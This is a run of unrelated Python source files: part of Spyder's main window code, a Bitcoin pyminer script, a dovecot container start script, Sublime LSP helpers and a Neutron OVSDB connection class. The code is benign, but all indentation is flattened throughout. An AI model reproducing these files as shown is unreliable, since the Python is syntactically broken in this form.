from qtpy.QtCore import QUrlQuery
query = QUrlQuery()
query.addQueryItem("body", quote(issue_template))
url.setQuery(query)
else:
url.addEncodedQueryItem("body", quote(issue_template))
QDesktopServices.openUrl(url)
@Slot()
def google_group(self):
url = QUrl("http://groups.google.com/group/spyderlib")
QDesktopServices.openUrl(url)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.widgets.editor import TextEditBaseWidget
# if focused widget isn't valid try the last focused
if not isinstance(widget, TextEditBaseWidget):
widget = self.previous_focused_widget
if isinstance(widget, TextEditBaseWidget):
getattr(widget, callback)()
def redirect_internalshell_stdio(self, state):
if state:
self.console.shell.interpreter.redirect_stds()
else:
self.console.shell.interpreter.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
programs.run_python_script_in_terminal(fname, wdir, args,
interact, debug, python_args)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
else:
self.extconsole.visibility_changed(True)
self.extconsole.raise_()
self.extconsole.start(
fname=to_text_string(fname), wdir=to_text_string(wdir),
args=to_text_string(args), interact=interact,
debug=debug, python=python, post_mortem=post_mortem,
python_args=to_text_string(python_args) )
def execute_in_external_console(self, lines, focus_to_editor):
"""
Execute lines in the external or IPython console and optionally give
focus to the editor
"""
if self.ipyconsole is None or self.last_console_plugin_focus_was_python:
console = self.extconsole
else:
console = self.ipyconsole
console.visibility_changed(True)
console.raise_()
console.execute_code(lines)
if focus_to_editor:
self.editor.visibility_changed(True)
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
programs.start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
fname = encoding.to_unicode_from_fs(fname)
if osp.isfile(fname):
self.open_file(fname, external=True)
elif osp.isfile(osp.join(CWD, fname)):
self.open_file(osp.join(CWD, fname), external=True)
#---- PYTHONPATH management, etc.
def get_spyder_pythonpath(self):
"""Return Spyder PYTHONPATH"""
return self.path+self.project_path
def add_path_to_sys_path(self):
"""Add Spyder path to sys.path"""
for path in reversed(self.get_spyder_pythonpath()):
sys.path.insert(1, path)
def remove_path_from_sys_path(self):
"""Remove Spyder path from sys.path"""
sys_path = sys.path
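# Note (added comment): add_path_to_sys_path() above inserts entries at
# index 1 (index 0 is conventionally the script's own directory), so the
# loop below pops matching entries from that same position.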
while sys_path[1] in self.get_spyder_pythonpath():
sys_path.pop(1)
@Slot()
def path_manager_callback(self):
"""Spyder path manager"""
from spyder.widgets.pathmanager import PathManager
self.remove_path_from_sys_path()
project_path = self.projects.get_pythonpath()
dialog = PathManager(self, self.path, project_path, sync=True)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.exec_()
self.add_path_to_sys_path()
encoding.writelines(self.path, self.SPYDER_PATH) # Saving path
self.sig_pythonpath_changed.emit()
def pythonpath_changed(self):
"""Projects PYTHONPATH contribution has changed"""
self.remove_path_from_sys_path()
self.project_path = self.projects.get_pythonpath()
self.add_path_to_sys_path()
self.sig_pythonpath_changed.emit()
@Slot()
def win_env(self):
"""Show Windows current user environment variables"""
self.dialog_manager.show(WinUserEnvDialog(self))
#---- Preferences
def apply_settings(self):
"""Apply settings changed in 'Preferences' dialog box"""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes Issue 2036
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
else:
qapp.setStyle(CONF.get('main', 'windows_style',
self.default_style))
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
if CONF.get('main', 'animated_docks'):
default = default|QMainWindow.AnimatedDocks
self.setDockOptions(default)
self.apply_panes_settings()
self.apply_statusbar_settings()
def apply_panes_settings(self):
"""Update dockwidgets features settings"""
# Update toggle action on menu
for child in self.widgetlist:
features = child.FEATURES
if CONF.get('main', 'vertical_dockwidget_titlebars'):
features = features | QDockWidget.DockWidgetVerticalTitleBar
if not self.dockwidgets_locked:
features = features | QDockWidget.DockWidgetMovable
child.dockwidget.setFeatures(features)
child.update_margins()
def apply_statusbar_settings(self):
"""Update status bar widgets settings"""
show_status_bar = CONF.get('main', 'show_status_bar')
self.statusBar().setVisible(show_status_bar)
if show_status_bar:
for widget, name in ((self.mem_status, 'memory_usage'),
(self.cpu_status, 'cpu_usage')):
if widget is not None:
widget.setVisible(CONF.get('main', '%s/enable' % name))
widget.set_interval(CONF.get('main', '%s/timeout' % name))
else:
return
@Slot()
def edit_preferences(self):
"""Edit Spyder preferences"""
from spyder.plugins.configdialog import ConfigDialog
dlg = ConfigDialog(self)
dlg.size_change.connect(self.set_prefs_size)
if self.prefs_dialog_size is not None:
dlg.resize(self.prefs_dialog_size)
for PrefPageClass in self.general_prefs:
widget = PrefPageClass(dlg, main=self)
widget.initialize()
dlg.add_page(widget)
for plugin in [self.workingdirectory, self.editor,
self.projects, self.extconsole, self.ipyconsole,
self.historylog, self.help, self.variableexplorer,
self.onlinehelp, self.explorer, self.findinfiles
]+self.thirdparty_plugins:
if plugin is not None:
try:
widget = plugin.create_configwidget(dlg)
if widget is not None:
dlg.add_page(widget)
except Exception:
traceback.print_exc(file=sys.stderr)
if self.prefs_index is not None:
dlg.set_current_index(self.prefs_index)
dlg.show()
dlg.check_all_settings()
dlg.pages_widget.currentChanged.connect(self.__preference_page_changed)
dlg.exec_()
def __preference_page_changed(self, index):
"""Preference page index has changed"""
self.prefs_index = index
def set_prefs_size(self, size):
"""Save preferences dialog size"""
self.prefs_dialog_size = size
#---- Shortcuts
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_sc_to_tip=False):
"""
Register QAction or QShortcut to Spyder main application,
with shortcut (context, name, default)
"""
self.shortcut_data.append( (qaction_or_qshortcut, context,
name, add_sc_to_tip) )
def apply_shortcuts(self):
"""Apply shortcuts settings to all widgets/plugins"""
toberemoved = []
for index, (qobject, context, name,
add_sc_to_tip) in enumerate(self.shortcut_data):
keyseq = QKeySequence( get_shortcut(context, name) )
try:
if isinstance(qobject, QAction):
if sys.platform == 'darwin' and \
qobject._shown_shortcut == 'missing':
qobject._shown_shortcut = keyseq
else:
qobject.setShortcut(keyseq)
if add_sc_to_tip:
add_shortcut_to_tooltip(qobject, context, name)
elif isinstance(qobject, QShortcut):
qobject.setKey(keyseq)
except RuntimeError:
# Object has been deleted
toberemoved.append(index)
for index in sorted(toberemoved, reverse=True):
self.shortcut_data.pop(index)
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 1 is faster than True
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See Issue 1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
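# Illustrative client sketch (added comment, not part of the original
# source): a second Spyder instance hands a file to this server by writing
# the UTF-8 path and reading the one-byte acknowledgement. The CONF import
# location is an assumption; the port is the one stored above in
# 'main'/'open_files_port'.
#
#     import socket
#     from spyder.config.main import CONF  # assumed import location
#     client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#     client.connect(('127.0.0.1', CONF.get('main', 'open_files_port')))
#     client.sendall(u'/path/to/script.py'.encode('utf-8'))
#     client.recv(1)  # server replies with a single space on success
#     client.close()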
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""
Quit and Restart Spyder application.
If reset is True, Spyder settings are reset to defaults on restart.
"""
# Get start path to use in restart script
spyder_start_directory = get_module_path('spyder')
restart_script = osp.join(spyder_start_directory, 'app', 'restart.py')
# Get any initial argument passed when spyder was started
# Note: Variables defined in bootstrap.py and spyder/app/start.py
env = os.environ.copy()
bootstrap_args = env.pop('SPYDER_BOOTSTRAP_ARGS', None)
spyder_args = env.pop('SPYDER_ARGS')
# Get current process and python running spyder
pid = os.getpid()
python = sys.executable
# Check if started with bootstrap.py
if bootstrap_args is not None:
spyder_args = bootstrap_args
is_bootstrap = True
else:
is_bootstrap = False
# Pass variables as environment variables (str) to restarter subprocess
env['SPYDER_ARGS'] = spyder_args
env['SPYDER_PID'] = str(pid)
env['SPYDER_IS_BOOTSTRAP'] = str(is_bootstrap)
env['SPYDER_RESET'] = str(reset)
if DEV:
if os.name == 'nt':
env['PYTHONPATH'] = ';'.join(sys.path)
else:
env['PYTHONPATH'] = ':'.join(sys.path)
# Build the command and popen arguments depending on the OS
if os.name == 'nt':
# Hide flashing command prompt
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
shell = False
else:
startupinfo = None
shell = True
command = '"{0}" "{1}"'
command = command.format(python, restart_script)
try:
if self.closing(True):
subprocess.Popen(command, shell=shell, env=env,
startupinfo=startupinfo)
self.console.quit()
except Exception as error:
# If there is an error with subprocess, Spyder should not quit and
# the error can be inspected in the internal console
print(error)
print(command)
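# Note (added comment): restart.py is expected to read the SPYDER_ARGS,
# SPYDER_PID, SPYDER_IS_BOOTSTRAP and SPYDER_RESET variables set above,
# wait for this process (SPYDER_PID) to exit, and then relaunch Spyder
# with the original arguments, resetting the configuration first when
# SPYDER_RESET is 'True'. This description is inferred from the variables
# passed here, not from restart.py itself.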
# ---- Interactive Tours
def show_tour(self, index):
""" """
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Check for Spyder Updates
def _check_updates_ready(self):
"""Called by WorkerUpdates when ready"""
from spyder.widgets.helperwidgets import MessageCheckBox
# `feedback = False` is used on startup, so only positive feedback is
# given. `feedback = True` is used after startup (i.e. when using the
# menu action) and gives feedback whether updates are found or not.
feedback = self.give_updates_feedback
# Get results from worker
update_available = self.worker_updates.update_available
latest_release = self.worker_updates.latest_release
error_msg = self.worker_updates.error
url_r = 'https://github.com/spyder-ide/spyder/releases'
url_i = 'http://pythonhosted.org/spyder/installation.html'
# Define the custom QMessageBox
box = MessageCheckBox()
box.setWindowTitle(_("Spyder updates"))
box.set_checkbox_text(_("Check for updates on startup"))
box.setStandardButtons(QMessageBox.Ok)
box.setDefaultButton(QMessageBox.Ok)
# The next line is commented out because it freezes the dialog.
# For now there is no info icon; this solves issue #3609.
#box.setIcon(QMessageBox.Information)
# Adjust the checkbox depending on the stored configuration
section, option = 'main', 'check_updates_on_startup'
check_updates = CONF.get(section, option)
box.set_checked(check_updates)
if error_msg is not None:
msg = error_msg
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
else:
if update_available:
msg = _("<b>Spyder %s is available!</b> <br><br>Please use "
"your package manager to update Spyder or go to our "
"<a href=\"%s\">Releases</a> page to download this "
"new version. <br><br>If you are not sure how to "
"proceed to update Spyder please refer to our "
" <a href=\"%s\">Installation</a> instructions."
"") % (latest_release, url_r, url_i)
box.setText(msg)
box.set_check_visible(True)
box.exec_()
check_updates = box.is_checked()
elif feedback:
msg = _("Spyder is up to date.")
box.setText(msg)
box.set_check_visible(False)
box.exec_()
check_updates = box.is_checked()
# Update checkbox based on user interaction
CONF.set(section, option, check_updates)
# Enable check_updates_action after the thread has finished
self.check_updates_action.setDisabled(False)
# Provide feedback when clicking the menu if check on startup is on
self.give_updates_feedback = True
@Slot()
def check_updates(self):
"""
Check for Spyder updates on GitHub releases using a QThread.
"""
from spyder.workers.updates import WorkerUpdates
# Disable check_updates_action while the thread is working
self.check_updates_action.setDisabled(True)
if self.thread_updates is not None:
self.thread_updates.terminate()
self.thread_updates = QThread(self)
self.worker_updates = WorkerUpdates(self)
self.worker_updates.sig_ready.connect(self._check_updates_ready)
self.worker_updates.sig_ready.connect(self.thread_updates.quit)
self.worker_updates.moveToThread(self.thread_updates)
self.thread_updates.started.connect(self.worker_updates.start)
self.thread_updates.start()
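# Note (added comment): the method above uses Qt's "worker object" idiom:
# the worker is created in the GUI thread, moved to a dedicated QThread,
# kicked off by the thread's started signal, and the thread is quit from
# the worker's sig_ready signal, so the network check never blocks the
# GUI event loop.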
#==============================================================================
# Utilities to create the 'main' function
#==============================================================================
def initialize():
"""Initialize Qt, patching sys.exit and eventually setting up ETS"""
# This doesn't create our QApplication, just holds a reference to
# MAIN_APP, created above to show our splash screen as early as
# possible
app = qapplication()
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
if PYQT5:
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
# Selecting Qt4 backend for Enthought Tool Suite (if installed)
try:
from enthought.etsconfig.api import ETSConfig
ETSConfig.toolkit = 'qt4'
except ImportError:
pass
return app
class Spy(object):
"""
Inspect Spyder internals
Attributes:
app Reference to main QApplication object
window Reference to spyder.MainWindow widget
"""
def __init__(self, app, window):
self.app = app
self.window = window
def __dir__(self):
return list(self.__dict__.keys()) +\
[x for x in dir(self.__class__) if x[0] != '_']
def versions(self):
return get_versions()
def run_spyder(app, options, args):
"""
Create and show Spyder's main window
Start QApplication event loop
"""
#TODO: insert here
# Main window
main = MainWindow(options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.shell.exit_interpreter()
except BaseException:
pass
raise
main.show()
main.post_visible_setup()
if main.console:
main.console.shell.interpreter.namespace['spy'] = \
Spy(app=app, window=main)
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if running_in_mac_app():
app.sig_open_external_file.connect(main.open_external_file)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not PYTEST:
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main():
"""Main function"""
# **** Collect command line options ****
# Note regarding Options:
# It's important to collect options before monkey patching sys.exit,
# otherwise optparse won't be able to exit if the --help option is passed
options, args = get_options()
if set_attached_console_visible is not None:
set_attached_console_visible(DEBUG or options.show_console \
or options.reset_config_files \
or options.reset_to_defaults \
or options.optimize)
app = initialize()
if options.reset_config_files:
# <!> Remove all configuration files!
reset_config_files()
return
elif options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults(save=True)
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# Show crash dialog
if CONF.get('main', 'crash', False) and not DEV:
CONF.set('main', 'crash', False)
if SPLASH is not None:
SPLASH.hide()
QMessageBox.information(None, "Spyder",
"Spyder crashed during last session.<br><br>"
"If Spyder does not start at all and <u>before submitting a "
"bug report</u>, please try to reset settings to defaults by "
"running Spyder with the command line option '--reset':<br>"
"<span style=\'color: #555555\'><b>python spyder --reset"
"</b></span><br><br>"
"<span style=\'color: #ff5555\'><b>Warning:</b></span> "
"this command will remove all your Spyder configuration files "
"located in '%s').<br><br>"
"If restoring the default settings does not help, please take "
"the time to search for <a href=\"%s\">known bugs</a> or "
"<a href=\"%s\">discussions</a> matching your situation before "
"eventually creating a new issue <a href=\"%s\">here</a>. "
"Your feedback will always be greatly appreciated."
"" % (get_conf_path(), __project_url__,
__forum_url__, __project_url__))
# Create main window
mainwindow = None
try:
mainwindow = run_spyder(app, options, args)
except FontError as fontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('main', 'icon_theme', 'spyder 2')
except BaseException:
CONF.set('main', 'crash', True)
import traceback
traceback.print_exc(file=STDERR)
traceback.print_exc(file=open('spyder_crash.log', 'w'))
if mainwindow is None:
# An exception occurred
if SPLASH is not None:
SPLASH.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] is not None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
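# Illustrative examples for the helpers above (added comments, not part of
# the original miner; '@I' uses native byte order, so a little-endian host
# is assumed). bytereverse() swaps the byte order of one 32-bit word,
# bufreverse() swaps the bytes inside each 4-byte word of a buffer, and
# wordreverse() reverses the order of the 4-byte words, so applying
# bufreverse() and then wordreverse() reverses the whole buffer:
#
#     bytereverse(0x12345678) == 0x78563412
#     bufreverse('\x01\x02\x03\x04\x05\x06\x07\x08') == '\x04\x03\x02\x01\x08\x07\x06\x05'
#     wordreverse('\x01\x02\x03\x04\x05\x06\x07\x08') == '\x05\x06\x07\x08\x01\x02\x03\x04'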
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76 bytes of the 80-byte header do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
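# Added note: this is the standard midstate optimisation. The 76 constant
# header bytes are hashed once here; every nonce iteration below only
# copies the partially-updated SHA-256 object and feeds it the 4 nonce
# bytes, instead of re-hashing the full 80-byte header each time.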
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash the final 4 bytes, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 18302
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
start.py
|
#!/usr/bin/python3
import os
import glob
import multiprocessing
import logging as log
import sys
from podop import run_server
from socrate import system, conf
log.basicConfig(stream=sys.stderr, level=os.environ.get("LOG_LEVEL", "WARNING"))
def start_podop():
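    # drop root privileges before serving requests (uid 8 is assumed
    # to be the mail user in this image)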
os.setuid(8)
url = "http://" + os.environ["ADMIN_ADDRESS"] + "/internal/dovecot/§"
run_server(0, "dovecot", "/tmp/podop.socket", [
("quota", "url", url ),
("auth", "url", url),
("sieve", "url", url),
])
# Actual startup script
os.environ["FRONT_ADDRESS"] = system.get_host_address_from_environment("FRONT", "front")
os.environ["ADMIN_ADDRESS"] = system.get_host_address_from_environment("ADMIN", "admin")
os.environ["ANTISPAM_WEBUI_ADDRESS"] = system.get_host_address_from_environment("ANTISPAM_WEBUI", "antispam:11334")
for dovecot_file in glob.glob("/conf/*.conf"):
conf.jinja(dovecot_file, os.environ, os.path.join("/etc/dovecot", os.path.basename(dovecot_file)))
os.makedirs("/conf/bin", exist_ok=True)
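# render helper scripts from templates and mark them executable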
for script_file in glob.glob("/conf/*.script"):
out_file = os.path.join("/conf/bin/", os.path.basename(script_file).replace('.script',''))
conf.jinja(script_file, os.environ, out_file)
os.chmod(out_file, 0o555)
# Run Podop, then postfix
multiprocessing.Process(target=start_podop).start()
os.system("chown mail:mail /mail")
os.system("chown -R mail:mail /var/lib/dovecot /conf")
os.execv("/usr/sbin/dovecot", ["dovecot", "-c", "/etc/dovecot/dovecot.conf", "-F"])
|
helpers.py
|
from LSP.plugin.core.typing import Any, Callable, List, Optional, Tuple
import re
import sublime
import subprocess
import threading
StringCallback = Callable[[str], None]
SemanticVersion = Tuple[int, int, int]
def run_command_sync(args: List[str], cwd: Optional[str] = None) -> Tuple[str, Optional[str]]:
"""
Runs the given command synchronously.
    :returns: A two-element tuple with the command output and an optional error. If running the command failed, the
        first tuple element will be an empty string and the second will contain the captured output (including
        `stderr`). If the command succeeded, the second tuple element will be `None`.
"""
try:
output = subprocess.check_output(args, cwd=cwd, shell=sublime.platform() == 'windows', stderr=subprocess.STDOUT)
return (decode_bytes(output).strip(), None)
except subprocess.CalledProcessError as error:
return ('', decode_bytes(error.output).strip())
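# Illustrative usage (hypothetical command):
#   output, error = run_command_sync(['git', '--version'])
#   if error is None:
#       print(output)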
def run_command_async(args: List[str], on_success: StringCallback, on_error: StringCallback, **kwargs: Any) -> None:
"""
Runs the given command asynchronously.
    On success, calls the provided `on_success` callback with the value the command returned.
    On error, calls the provided `on_error` callback with the captured `stderr` output. Note that both callbacks
    are invoked on the worker thread, not on the calling thread.
"""
    def execute(on_success, on_error, args):
        result, error = run_command_sync(args, **kwargs)
        if error is not None:
            on_error(error)
        else:
            on_success(result)
thread = threading.Thread(target=execute, args=(on_success, on_error, args))
thread.start()
def decode_bytes(data: bytes) -> str:
"""
Decodes provided bytes using `utf-8` decoding, ignoring potential decoding errors.
"""
return data.decode('utf-8', 'ignore')
def parse_version(version: str) -> SemanticVersion:
"""
Converts a version string to a version tuple (major, minor, patch).
:returns: The semantic version in form of a 3-element tuple.
"""
match = re.match(r'v?(?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d+)(?:-.+)?', version)
if match:
major, minor, patch = match.groups()
return int(major), int(minor), int(patch)
else:
return 0, 0, 0
def version_to_string(version: SemanticVersion) -> str:
"""
Returns a string representation of a version tuple.
"""
return '.'.join([str(c) for c in version])
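# Illustrative round trip:
#   parse_version('v1.2.3-beta')    -> (1, 2, 3)
#   version_to_string((1, 2, 3))    -> '1.2.3'
#   parse_version('not-a-version')  -> (0, 0, 0)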
def log_and_show_message(message: str, additional_logs: Optional[str] = None, show_in_status: bool = True) -> None:
"""
Logs the message in the console and optionally sets it as a status message on the window.
:param message: The message to log or show in the status.
:param additional_logs: The extra value to log on a separate line.
:param show_in_status: Whether to briefly show the message in the status bar of the current window.
"""
print(message, '\n', additional_logs) if additional_logs else print(message)
if show_in_status:
sublime.active_window().status_message(message)
|
connection.py
|
# Copyright (c) 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import threading
import traceback
from ovs.db import idl
from ovs import poller
import six
from six.moves import queue as Queue
import tenacity
from neutron.agent.ovsdb.native import helpers
from neutron.agent.ovsdb.native import idlutils
class TransactionQueue(Queue.Queue, object):
def __init__(self, *args, **kwargs):
super(TransactionQueue, self).__init__(*args, **kwargs)
alertpipe = os.pipe()
        # NOTE(ivasilevskaya) Python 3 doesn't allow unbuffered text I/O.
        # Get around this constraint by opening the pipe in binary mode.
self.alertin = os.fdopen(alertpipe[0], 'rb', 0)
self.alertout = os.fdopen(alertpipe[1], 'wb', 0)
def get_nowait(self, *args, **kwargs):
try:
result = super(TransactionQueue, self).get_nowait(*args, **kwargs)
except Queue.Empty:
return None
self.alertin.read(1)
return result
def put(self, *args, **kwargs):
super(TransactionQueue, self).put(*args, **kwargs)
self.alertout.write(six.b('X'))
self.alertout.flush()
@property
def alert_fileno(self):
return self.alertin.fileno()
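# TransactionQueue combines a Queue with the self-pipe pattern: put()
# writes one byte to wake any poller watching alert_fileno, and
# get_nowait() drains one byte per dequeued item, so the pipe's fill
# level mirrors the queue length.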
class Connection(object):
def __init__(self, connection, timeout, schema_name, idl_class=None):
self.idl = None
self.connection = connection
self.timeout = timeout
self.txns = TransactionQueue(1)
self.lock = threading.Lock()
